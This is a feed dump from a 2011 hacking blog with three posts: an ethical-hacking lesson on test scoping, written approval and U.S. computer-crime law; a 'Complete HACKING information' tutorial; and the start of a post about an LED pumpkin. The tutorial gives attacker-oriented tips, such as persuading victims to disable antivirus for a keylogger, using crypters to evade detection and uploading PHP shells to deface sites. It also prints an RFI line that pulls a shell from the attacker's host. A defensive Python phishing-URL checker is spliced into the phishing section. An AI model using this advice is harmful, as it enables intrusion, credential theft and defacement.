Security assessments in which ethical hacking activities will take place  are composed of three phases. These include the scoping of the  assessment in which goals and guidelines are established, performing the  assessment, and performing post assessment activities. The post  assessment activities are when the report and remediation activities  would occur. Figure 1.2 shows the three phases of the assessment and  their typical times. &lt;br /&gt;
&lt;br /&gt;
Establishing Goals &lt;br /&gt;
&lt;br /&gt;
The need to establish goals is also critical. Although you might be  ready to jump in and begin hacking, a good plan will detail the goals  and objectives of the test. Some common goals include system  certification and accreditation, verification of policy compliance, and  proof that the IT infrastructure has the capability to defend against  technical attacks. &lt;br /&gt;
&lt;br /&gt;
Are the goals to certify and accredit the systems being tested? Certification is a technical evaluation of the system that can be carried out by independent security teams or by the existing staff. Its goal is to uncover any vulnerabilities or weaknesses in the implementation. Accreditation is management’s formal acceptance of the certified system and of the residual risk it carries. Your goal will be to test these systems to make sure that they are configured and operating as expected, that they connect to and communicate with other systems in a secure and controlled manner, and that they handle data in a secure and approved manner.&lt;br /&gt;
&lt;br /&gt;
If the goals of the penetration test are to determine whether current  policies are being followed, the test methods and goals might be  somewhat different. The security team will be looking at the controls  implemented to protect information being stored, being transmitted, or  being processed. This type of security test might not have as much  hands-on hacking, but might use more social engineering techniques and  testing of physical controls. You might even direct one of the team  members to perform a little dumpster diving. &lt;br /&gt;
&lt;br /&gt;
The goal of a technical attack might be to see what an insider or  outsider can access. Your goal might be to gather information as an  outsider and then use that data to launch an attack against a web server  or externally accessible system. &lt;br /&gt;
&lt;br /&gt;
Regardless of what type of test you are asked to perform, there are some  basic questions you can ask to help establish the goals and objectives  of the tests. These include the following: &lt;br /&gt;
&lt;br /&gt;
What is the organization’s mission? &lt;br /&gt;
What specific outcomes does the organization expect? &lt;br /&gt;
What is the budget? &lt;br /&gt;
When will tests be performed — during work hours, after hours, or weekends? &lt;br /&gt;
How much time will the organization commit to completing the security evaluation? &lt;br /&gt;
Will insiders be notified? &lt;br /&gt;
Will customers be notified? &lt;br /&gt;
How far will the test proceed? Root the box, gain a prompt, or attempt to retrieve another prize, such as the CEO’s password. &lt;br /&gt;
Who do you contact should something go wrong? &lt;br /&gt;
What are the deliverables? &lt;br /&gt;
What outcome is management seeking from these tests?&lt;br /&gt;
&lt;br /&gt;
Getting Approval &lt;br /&gt;
&lt;br /&gt;
Getting approval is a critical event in the testing process. Before any  testing actually begins, you need to make sure that you have a plan that  has been approved in writing. If this is not done, you and your team  might face unpleasant consequences, which might include being fired or  even criminal charges.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Written approval is the most critical step of the testing process. You should never perform any tests without written approval. &lt;br /&gt;
&lt;br /&gt;
If you are an independent consultant, you should also consider obtaining insurance before starting any type of test. Umbrella policies and errors-and-omissions policies are commonly used. These types of liability policies can help protect you should anything go wrong. To help make sure that the approval process goes smoothly, you should make sure that someone is the champion of this project. This champion or project sponsor is the lead contact to upper management and your contact person. Project sponsors can be instrumental in helping you gain permission to begin testing and also in providing you with the funding and materials needed to make this a success.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTE&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Management support is critical for a security test to be successful (or, in Kartik and Travis’ case, for avoiding being expelled). &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Ethical Hacking Report&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Describe test deliverables &lt;br /&gt;
&lt;br /&gt;
Although we have not actually begun testing, you do need to start  thinking about the final report. Throughout the entire process, you  should be in close contact with management to keep them abreast of your  findings. There shouldn’t be any big surprises when you submit the  report. While you might have found some serious problems, they should be  discussed with management before the report is written and submitted.  The goal is to keep them in the loop and advised of the status of the  assessment. If you find items that present a critical vulnerability, you  should stop all tests and immediately inform management. Your priority  should always be the health and welfare of the organization. &lt;br /&gt;
&lt;br /&gt;
The report itself should detail the results of what was found.  Vulnerabilities should be discussed as should the potential risk they  pose. Although people aren’t fired for being poor report writers, don’t  expect to be promoted or praised for your technical findings if the  report doesn’t communicate your findings clearly. The report should  present the results of the assessment in an easy, understandable, and  fully traceable way. The report should be comprehensive and  self-contained. Most reports contain the following sections: &lt;br /&gt;
&lt;br /&gt;
Introduction &lt;br /&gt;
Statement of work performed &lt;br /&gt;
Results and conclusions &lt;br /&gt;
Recommendations &lt;br /&gt;
&lt;br /&gt;
Since most companies do not have unlimited budgets and cannot secure everything, you should rank your recommendations so that those addressing the highest-impact, most likely risks are at the top of the list. &lt;br /&gt;
&lt;br /&gt;
The report needs to be adequately secured while in electronic storage.  Encryption should be used. The printed copy of the report should be  marked “Confidential” and while in its printed form, care should be  taken to protect the report from unauthorized individuals. You have an  ongoing responsibility to ensure the safety of the report and all  information gathered. Most consultants destroy reports and all test  information after a contractually obligated period of time. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
The report is a piece of highly sensitive material and should be protected in storage and when in printed form. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Ethics and Legality&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Know the laws dealing with computer crimes and their implications &lt;br /&gt;
&lt;br /&gt;
Recent FBI reports on computer crime indicate that unauthorized computer use in 2005 was reported by 56 percent of U.S. companies surveyed. This is an increase of 3 percent from 2004. Various website attacks were up 6 percent from 2004. These figures indicate that computer crime caused by hackers continues to increase. A computer or network can become the victim of a crime committed by a hacker. Hackers use computers as a tool to commit a crime or to plan, track, and control a crime against other computers or networks. Your job as an ethical hacker is to find vulnerabilities before the attackers do and help prevent them from carrying out malicious activities. Tracking and prosecuting hackers can be a difficult job, as international law is often ill-suited to deal with the problem. Unlike conventional crimes that occur in one location, hacking crimes might originate in India, use a system based in Singapore, and target a computer network located in Canada. Each country has conflicting views on what constitutes cyber crime. Even if hackers can be punished, attempting to do so can be a legal nightmare. It is hard to apply national borders to a medium such as the Internet that is essentially borderless.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTE&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Some individuals approach computing and hacking from a social perspective and believe that hacking can promote change. These individuals are known as hacktivists; these “hacker activists” use computers and technology for hi-tech campaigning and social change. They believe that defacing websites and hacking servers is acceptable as long as it promotes their goals. Regardless of their motives, unauthorized hacking remains illegal and they are subject to the same computer crime laws as any other criminal. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Overview of U.S. Federal Laws &lt;br /&gt;
Although some hackers might have the benefit of bouncing around the globe from system to system, your work will likely occur within the confines of the host nation. The United States and some other countries have enacted strict laws to deal with hackers and hacking. During the past five years, the U.S. federal government has taken an active role in dealing with computer, Internet, privacy, and corporate threats, vulnerabilities, and exploits. These are laws you should be aware of and not become entangled in. Hacking is covered under Title 18 of the U.S. Code (Crimes and Criminal Procedure), Part I (Crimes), Chapter 47 (Fraud and False Statements), Sections 1029 and 1030. Each is described here: &lt;br /&gt;
&lt;br /&gt;
Section 1029&lt;br /&gt;
Fraud and related activity in connection with access devices. This law gives the U.S. federal government the power to prosecute anyone who knowingly and with intent to defraud produces, uses, or traffics in one or more counterfeit access devices. The statute defines an access device broadly as any card, plate, code, account number, PIN, telecommunications service identifier, or other means of account access that can be used to obtain money, goods, services, or anything else of value. Stolen passwords, credit card numbers, and long-distance telephone access codes all qualify, as do hardware or software built specifically to generate such credentials for unauthorized access.&lt;br /&gt;
&lt;br /&gt;
Section 1030&lt;br /&gt;
Fraud and related activity in connection with computers. This section is the codification of the Computer Fraud and Abuse Act and covers just about any computer or device connected to a network or to the Internet. It mandates penalties for anyone who accesses a computer without authorization or exceeds authorized access. This is a powerful law because companies can use it to prosecute employees who use the rights the company has given them to carry out fraudulent activities. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Sections 1029 and 1030 are the main statutes that address computer crime in U.S. federal law. Understand their basic coverage and penalties. &lt;br /&gt;
&lt;br /&gt;
The Evolution of Hacking Laws &lt;br /&gt;
In 1985, hacking was still in its infancy in England. Because of the lack of hacking laws, some British hackers felt there was no way they could be prosecuted. Triludan the Warrior (the handle of Robert Schifreen, who worked with Stephen Gold) was one of these individuals. Besides breaking into the British Telecom system, he also obtained an admin password for Prestel. Prestel was a dialup service that provided online services, shopping, email, sports, and weather. One user of Prestel was His Royal Highness, Prince Philip. Triludan broke into the Prince’s mailbox, among various other activities such as leaving the Prestel system admins messages and taunts. Triludan the Warrior was caught on April 10, 1985, and was charged with five counts of forgery, as no hacking laws existed. After several years and a 3.5 million dollar legal battle, the convictions were overturned on appeal and Triludan was acquitted. Others were not so lucky, because in 1990 Parliament passed the Computer Misuse Act, which made unauthorised access to a computer an offence and unauthorised modification of its contents punishable by up to five years in jail. Today, the UK, along with most of the Western world, has extensive laws against hacking. &lt;br /&gt;
&lt;br /&gt;
The federal punishment described in Sections 1029 and 1030 for hacking into computers ranges from a fine or imprisonment of not more than one year, for the least serious offenses, up to a fine and imprisonment of not more than twenty years. Where a case falls in this range depends on the seriousness of the criminal activity, whether it is a repeat offense, and what damage the hacker has done. Other federal laws that address hacking include: &lt;br /&gt;
&lt;br /&gt;
Electronic Communications Privacy Act of 1986&lt;br /&gt;
Mandates provisions for access, use, disclosure, interception, and privacy protection of electronic communications. The law encompasses 18 U.S.C. Section 2510 and following (the Wiretap Act) and Section 2701 and following (the Stored Communications Act). According to the U.S. Code, electronic communication “means any transfer of signs, signals, writing, images, sounds, data, or intelligence of any nature transmitted in whole or in part by a wire, radio, electromagnetic, photoelectronic, or photooptical system that affects interstate or foreign commerce.” This law makes it illegal for individuals to intercept communications in transit or to access them in storage without authorization. Although the wiretap provisions were originally written for voice communications, the Act now covers email and other electronic communications. &lt;br /&gt;
&lt;br /&gt;
Computer Fraud and Abuse Act of 1984&lt;br /&gt;
The Computer Fraud and Abuse Act (CFAA), first enacted in 1984 and substantially revised in 1986, protects certain types of information that the government regards as sensitive and the computers that hold it. The Act defines the term “protected computer” and imposes punishment for unauthorized access, or access exceeding authorization, to one of these protected computers or systems. The Act also mandates fines and jail time for those who commit specific computer-related actions, such as trafficking in passwords or extortion by threatening a computer. In 1994, Congress amended the CFAA to cover the transmission of malicious code, which was not included in the original Act. &lt;br /&gt;
&lt;br /&gt;
The Cyber Security Enhancement Act of 2002 - Part of the Homeland Security Act of 2002, this Act provides that hackers who carry out certain computer crimes can receive up to twenty years in jail if the offense knowingly or recklessly causes serious bodily injury, and up to a life sentence if it knowingly or recklessly causes or attempts to cause death. This means that if hackers disrupt a 911 system, they could spend the rest of their days in jail.&lt;br /&gt;
&lt;br /&gt;
The Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism (USA PATRIOT) Act of 2001 - Passed in response to the September 11, 2001 attacks. It strengthens computer crime laws and has been the subject of considerable controversy, because it gives the U.S. government wide latitude in pursuing criminals. Among other things, the Act lets investigators intercept the communications of a “computer trespasser” without a warrant when the owner or operator of the attacked system consents, and it authorizes delayed-notice (“sneak and peek”) search warrants. &lt;br /&gt;
&lt;br /&gt;
The Federal Information Security Management Act (FISMA) - Signed into  law in 2002 as part of the E-Government Act of 2002, replacing the  Government Information Security Reform Act (GISRA). FISMA was enacted to  address the information security requirements for non-national security  government agencies. FISMA provides a statutory framework for securing  government owned and operated IT infrastructures and assets. &lt;br /&gt;
&lt;br /&gt;
Federal Sentencing Guidelines of 1991 - Provide guidelines to judges so  that sentences would be handed down in a more uniform manner. &lt;br /&gt;
&lt;br /&gt;
Economic Espionage Act of 1996 - Makes theft of trade secrets a federal crime and defines strict penalties, which are harsher when the theft is intended to benefit a foreign government. &lt;br /&gt;
&lt;br /&gt;
U.S. Child Pornography Prevention Act of 1996 - Enacted to combat and  reduce the use of computer technology to produce and distribute  pornography. &lt;br /&gt;
&lt;br /&gt;
U.S. Health Insurance Portability and Accountability Act (HIPAA) of 1996 - Established privacy and security regulations for the health care industry. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Summary&lt;/h3&gt;&lt;br /&gt;
This lesson showed that security is based on the CIA triad: confidentiality, integrity, and availability. These principles must be applied to Information Technology (IT) networks and their data, and the data must be protected both in storage and in transit. &lt;br /&gt;
&lt;br /&gt;
Because the organization cannot provide complete protection for all of  its assets, a system must be developed to rank risk and vulnerabilities.  Organizations must seek to identify high risk and high impact events  for protective mechanisms. Part of the job of an ethical hacker is to  identify potential vulnerabilities to these critical assets and test  systems to see whether they are vulnerable to exploits. &lt;br /&gt;
&lt;br /&gt;
The activities described are security tests. Ethical hackers can perform security tests from an unknown perspective (black-box testing) or with all documentation and knowledge (white-box testing). The approach taken will depend on the time, funds, and objective of the security test. Organizations can have many aspects of their protective systems tested, such as physical security, phone systems, wireless access, insider access, or external hacking. To perform these tests, ethical hackers need a variety of skills. They must be adept in the technical aspects of networking but must also understand policy and procedure. No single ethical hacker will understand all operating systems, networking protocols, or application software, but that’s okay, as security tests are performed by teams of individuals where each brings a unique skill to the table. &lt;br /&gt;
&lt;br /&gt;
So, even though “God-like” knowledge isn’t required, an ethical hacker does need to understand the laws pertaining to hackers and hacking. He must also understand that the most important part of the pre-test activities is to obtain written authorization. No test should be performed without the written permission of the owner of the network or service. Following this simple rule will help you stay focused on the legitimate test objectives and help protect you from any activities or actions that might be seen as unethical.&lt;br /&gt;
&lt;br /&gt;
Part 2 will begin shortly&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-7249832037795472016?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/rjOpNtjmP9U" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/rjOpNtjmP9U/ethical-hacking-basics-class-part-1.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/02/ethical-hacking-basics-class-part-1.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-5532145697628682925</guid><pubDate>Tue, 22 Feb 2011 10:44:00 +0000</pubDate><atom:updated>2011-02-22T02:44:09.658-08:00</atom:updated><title>Complete HACKING information</title><description>&lt;h3 class="articleheading"&gt;Introduction:&lt;/h3&gt;We see millions of people going to different forums and websites and asking "how do I hack an email?" and "Can you hack blah for me?". So I thought I would create a tutorial that gives you the basic idea of what the heck a "HACK" is, and how to DEFEND YOURSELF AGAINST HACKERS. &lt;br /&gt;
&lt;h3 class="articleheading"&gt;&lt;a href="" name="intro"&gt;&lt;/a&gt;Disclaimer:&lt;/h3&gt;As i have seen &lt;b&gt;controversies&lt;/b&gt; in the past, here is the disclaimer.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;I or the staff of hacking team does not take any  responsibility if you use this tutorial in unethical way. This is  written to help you to beware of whats going around, and save your self  by not being hacked!&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/b&gt;&lt;h3 class="articleheading"&gt;&lt;a href="" name="bg"&gt;&lt;/a&gt;Background:&lt;/h3&gt;&lt;br /&gt;
Hacking goes back a long way; it was already well established by the time Windows 98 was designed. Hacking is basically finding the loopholes in a system and trying to leak information through them, which may get you critical data such as passwords or credit card details. Sometimes hacking is done purely out of a personal grudge.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Things to remember&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I suggest that you &lt;b&gt;KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THAT’S THE ONLY WAY YOU CAN LEARN.&lt;/b&gt;&lt;br /&gt;
&lt;h3 class="articleheading"&gt;&lt;a href="" name="code"&gt;&lt;/a&gt;Initialization&lt;/h3&gt;&lt;br /&gt;
Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically divided into two major areas:&lt;br /&gt;
&lt;br /&gt;
1. Email or the user information&lt;br /&gt;
2. Web based hacking.&lt;br /&gt;
&lt;h3 class="articleheading"&gt;&lt;a href="" name="code"&gt;&lt;/a&gt;Email or user information:&lt;/h3&gt;These days the most commonly used and famous way of hacking user  information like Emails, Passwords, Credit card details are as follow:&lt;br /&gt;
&lt;br /&gt;
a. Phishing&lt;br /&gt;
b. Brute Forcing&lt;br /&gt;
c. Keylogging&lt;br /&gt;
d. Trojans&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;a. Phishing:&lt;/b&gt;&lt;/u&gt;&lt;blockquote&gt;      Phishing is basically a mass attack. What the hacker does is create an absolutely look-alike copy of the login page of some website like Yahoo or Gmail and upload it to their own server. They then send the link to some n00b user. When the victim opens it, they think they are on the real Yahoo or Gmail page, enter their username and password, click Submit, and WHOA! the information has been submitted to the attacker. This is widely used by newcomers trying to enter the hacking world.&lt;br /&gt;
The most recent example in India was a scam involving ICICI Bank; lots of user info was stolen, as far as I remember. I read it somewhere in the newspaper and was thinking, what the hell!?&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Disadvantages:&lt;/b&gt; Many people still give it a try, but the main problem with phishing is that even a victim who knows a little about the Internet will read the URL in the address bar and realize it is not the genuine website.&lt;br /&gt;
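&lt;br /&gt;
The address-bar check described above can be automated. The following Python function is an added example and is not part of the original tutorial: it classifies a login URL as legitimate, insecure, look-alike, or unrelated against a constructed allow-list of brand domains (the allow-list and the sample URLs are assumptions for this example, not real phishing sites). It catches the tricks that defeat a casual glance at the URL: the brand name placed in a subdomain or in the path, the brand name placed in the userinfo part before the @ sign while the real host comes after it, a bare IP address as the host, and a homograph hostname that uses non-ASCII letters.&lt;br /&gt;
&lt;br /&gt;
```python
"""Classify login URLs against an allow-list of brand domains.

Added example for this page; the allow-list and the sample URLs are
constructed for illustration and are not real phishing sites.
"""
import ipaddress
from urllib.parse import urlparse

# Constructed allow-list: brand keyword mapped to the registered domains that
# brand legitimately uses for logins (an assumption for this example).
BRAND_DOMAINS = {
    "yahoo": ("yahoo.com",),
    "gmail": ("google.com", "gmail.com"),
}


def host_belongs_to(host, domain):
    """True if host equals domain or is a subdomain of it (dot-boundary
    check, so 'notyahoo.com' does not match 'yahoo.com')."""
    return host == domain or host.endswith("." + domain)


def classify_login_url(url, brands=BRAND_DOMAINS):
    """Return (verdict, reason); verdict is one of
    'legitimate', 'insecure', 'lookalike' or 'unrelated'."""
    parsed = urlparse(url)
    # urlparse strips any 'user:pass@' prefix, so hostname is the host the
    # browser would actually connect to, not what the victim reads first.
    host = (parsed.hostname or "").lower()
    if not host:
        return ("unrelated", "no hostname in URL")
    if not host.isascii():
        return ("lookalike", "non-ASCII characters in hostname (possible homograph)")
    try:
        ipaddress.ip_address(host)
        return ("lookalike", "bare IP address instead of a hostname")
    except ValueError:
        pass  # an ordinary hostname, carry on
    for brand, domains in brands.items():
        if any(host_belongs_to(host, d) for d in domains):
            if parsed.scheme != "https":
                return ("insecure", "genuine " + brand + " host but not https")
            return ("legitimate", "host is under a " + brand + " domain")
    # Not a brand host: does a brand name appear anywhere the victim might
    # glance at (userinfo before '@', hostname, or path)?
    userinfo = (parsed.username or "").lower()
    path = parsed.path.lower()
    for brand in brands:
        if brand in host or brand in userinfo or brand in path:
            return ("lookalike", "'" + brand + "' appears in URL but host is " + host)
    return ("unrelated", host + " is not a known login domain")


# Constructed sample links of the kind a phisher might send.
SAMPLE_URLS = [
    "https://login.yahoo.com/",                       # genuine
    "http://login.yahoo.com/",                        # genuine host, plain http
    "http://yahoo.com.free-login.example/index.php",  # brand as a subdomain label
    "http://mail.yahoo.com@secure-mail.example/",     # brand in userinfo, real host after '@'
    "http://203.0.113.9/yahoo/login.php",             # bare IP, brand only in the path
    "https://y\u0430hoo.com/",                        # Cyrillic 'a' homograph
    "https://example.org/news",                       # unrelated
]


def scan(urls=SAMPLE_URLS):
    """Return a mapping of URL to verdict for a batch of links."""
    return {u: classify_login_url(u)[0] for u in urls}


if __name__ == "__main__":
    for u, verdict in scan().items():
        print(verdict.ljust(10), u)
```
&lt;br /&gt;
Running it prints one verdict per sample URL. The allow-list comparison is the part worth copying into a mail filter or browser extension; the brand-keyword scan at the end is only a heuristic and will also flag harmless pages that merely mention a brand in their path, so treat a look-alike verdict as a prompt to look closer rather than as proof of fraud.&lt;br /&gt;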
&lt;/blockquote&gt;&lt;u&gt;&lt;b&gt;b. Brute Forcing&lt;/b&gt;&lt;/u&gt;&lt;blockquote&gt;          A brute forcer is basically a program that could be called a “cracker”. You give it the username you want to attack and, as the password source, a text file containing most of the words in the English language. It then tries every word in that file against the login and sees whether any of them matches. (Strictly speaking, trying a word list is a dictionary attack; a true brute force enumerates every possible character combination, which takes far longer.) You might have noticed threads titled “huge pass list” on different forums; they are nothing but password lists to feed into your brute forcer!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Disadvantages:&lt;/b&gt; &lt;br /&gt;
1. Sometimes brute forcing can go on for ages!&lt;br /&gt;
2. It isn’t guaranteed to succeed: if the password is not in the list, it will never be found.&lt;br /&gt;
3. These days many people use passwords mixing letters, digits, and symbols, which no word list contains.&lt;br /&gt;
4. Most of the big sites like Yahoo and Gmail are designed so that they present an image CAPTCHA after about three incorrect login attempts (and many lock the account outright), which stops the brute forcer.&lt;br /&gt;
&lt;br /&gt;
P.S.:- I have made some focused FTP, Gmail &amp;amp; Yahoo bruteforcers which are available on my website.&lt;br /&gt;
&lt;/blockquote&gt;&lt;b&gt;&lt;u&gt;c. Keylogging&lt;/u&gt;&lt;/b&gt;&lt;blockquote&gt;A keylogger helps you create a little file which is known as a "server". You gotta send your server to the victim; he has to click on it and then YOU'RE DONE! This is what happens.&lt;br /&gt;
Best possible way to hack someone. Keyloggers are basically programs which install themselves on your victim's computer, keep on recording each and every keystroke pressed by the victim on his keyboard, and send it to the hacker. There are many ways to receive the keystrokes, i.e. FTP, email, messengers. According to me this is the best way to trick your victim and get their information.&lt;/blockquote&gt;&lt;br /&gt;
&lt;blockquote&gt; &lt;br /&gt;
&lt;b&gt; Disadvantages &lt;/b&gt; :&lt;br /&gt;
1. When the victim receives the keylogger, in most cases their antivirus would auto-delete it. So you have to convince them to disable the antivirus by bluffing something.&lt;br /&gt;
2. Sometimes a firewall blocks the keylogs from being sent.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Tips :&lt;/b&gt;&lt;br /&gt;
1. There are some programs known as "crypters" which help you make your servers undetectable, so your victim's antivirus would not be able to detect them.&lt;br /&gt;
&lt;/blockquote&gt;&lt;b&gt;&lt;u&gt;d. Trojans:&lt;/u&gt;&lt;/b&gt;&lt;blockquote&gt;Trojans are like the father of keyloggers. A Trojan sends you the keylogs just as a keylogger does; on top of that, it lets you take control of the victim's computer: edit / delete / upload / download files from or to their computer. Some more funny features: it will make their keyboard go mad, it may keep on ejecting and re-inserting the CD-ROM. Much more..&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Disadvantages &lt;/b&gt; :&lt;br /&gt;
Same as keyloggers.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Tips :&lt;/b&gt;&lt;br /&gt;
Same as keylogger.&lt;br /&gt;
&lt;/blockquote&gt;&lt;h3 class="articleheading"&gt;&lt;a href="" name="code"&gt;&lt;/a&gt;Web Hacking:&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
I will discuss some of the most commonly used web hacking techniques which help hackers hack any website. This will help you to SAVE YOUR SITE!&lt;br /&gt;
&lt;br /&gt;
1. SQL Injection&lt;br /&gt;
2. XSS&lt;br /&gt;
3. Shells&lt;br /&gt;
4. RFI&lt;br /&gt;
5. There are some more, but they are TOOO big to be discussed here.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;1. SQL Injection:&lt;/b&gt;&lt;/u&gt;&lt;blockquote&gt;Most of the websites these days are connected to an SQL database, which helps them store usernames and passwords [encrypted] when a guest registers on their website. The SQL database processes a query every time a user logs in. It goes to the database, validates the password; if it's correct then it logs in the user, and if it's not then it gives an error.&lt;br /&gt;
So the basic funda is executing a command to parse a query in the database to try to exploit the information inside the database. I can't really put the entire tutorial about it here because this is the most complicated way to hack a website!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;P.S.:-&lt;/b&gt; If you wanna check if YOUR website is vulnerable to an SQL injection attack or not, then do the following.&lt;br /&gt;
&lt;br /&gt;
If your site's URL is:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;blockquote&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&amp;nbsp;yoursite.com/index.php?id=545&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;just add a  '  like this at the end &lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;blockquote&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&amp;nbsp;yoursite.com/index.php?id=545'&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;u&gt;&lt;b&gt; 2. XSS: &lt;/b&gt;&lt;/u&gt;&lt;blockquote&gt;                  XSS is another nice way to ahck some website. Suppose if some website/  forum is allowing HTML in the psot or articles, then a hacker can post a  malicious script into the content. So whenever a user opens up the  page, the cookies would be sent to the hacker. So he can login as that  user and f*ck the website up. &lt;br /&gt;
&lt;/blockquote&gt;&lt;u&gt;&lt;b&gt;3. Shells: &lt;/b&gt;&lt;/u&gt;&lt;blockquote&gt;                   Shell is a malicious .php script. What you have to do is, find a palce  in any website where you can upload any file like avatars, recepie, your  tricks, your feedbacks. And you try to upload your shell files from  there. And if its uploaded then WHOA!you open it from the URL bar and u  can see the entire "FTP" account of that webhosting. YOu can rename/edit  / upload/download anything u want including the index page.&lt;br /&gt;
This is also known as deface.&lt;br /&gt;
&lt;/blockquote&gt;&lt;u&gt;&lt;b&gt;4. RFI:&lt;/b&gt;&lt;/u&gt;&lt;blockquote&gt;                RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;blockquote&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&amp;nbsp;yoursite.com/shell.txt&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;and you found a vulnerable site to RFI... then you can do as follow:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;blockquote&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&amp;nbsp;victimssite.com/index.php?page=yousite.com/shell.txt&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;This will again give u the access of your victim's sites FTP , just as shell so you can f*ck up anything you want.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;P.S.:-&lt;/b&gt; If you wanna check if YOUR website is vulnerable to an RFI attack or not, then do the following.&lt;br /&gt;
&lt;br /&gt;
If your site's URL is:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;blockquote&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&amp;nbsp;yoursite.com/index.php?id=545&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;just add something liek this at the end &lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;blockquote&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&amp;nbsp;yoursite.com/index.php?id=http://www.google.com&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;And if it incldes the google page into your page, that means its vulnerable to RFI.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-5532145697628682925?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/Mu5CIznwrN8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/Mu5CIznwrN8/complete-hacking-information.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/02/complete-hacking-information.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-8165845600279912701</guid><pubDate>Wed, 27 Oct 2010 09:21:00 +0000</pubDate><atom:updated>2010-10-27T02:27:10.358-07:00</atom:updated><title>70 LED matrix in a Jack-o-lantern</title><description>&lt;a href="http://hackmystuff.blogspot.com/%3C/a%3E:%20"&gt;&lt;br /&gt;
&lt;img alt="" height="428" src="http://hackadaycom.files.wordpress.com/2010/10/70-led-in-a-pumpkin_small1.jpg?w=470&amp;amp;h=428" title="70-LED-in-a-pumpkin_small" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
What takes eight hours to solder and uses more shrink tubing than you thought imaginable? An LED matrix installed in a real pumpkin. When I mentioned that we’d like &lt;/a&gt;&lt;a href="http://hackaday.com/2010/10/22/halloween-props-pumpkin-in-standby-mode/"&gt;the LED pumpkin in last Friday’s post&lt;/a&gt; scaled up to a full LED matrix I had no idea it would be me doing the work. But [Caleb] and I thought it might be just the thing to present for the hacker’s favorite holiday.&lt;br /&gt;
&lt;br /&gt;
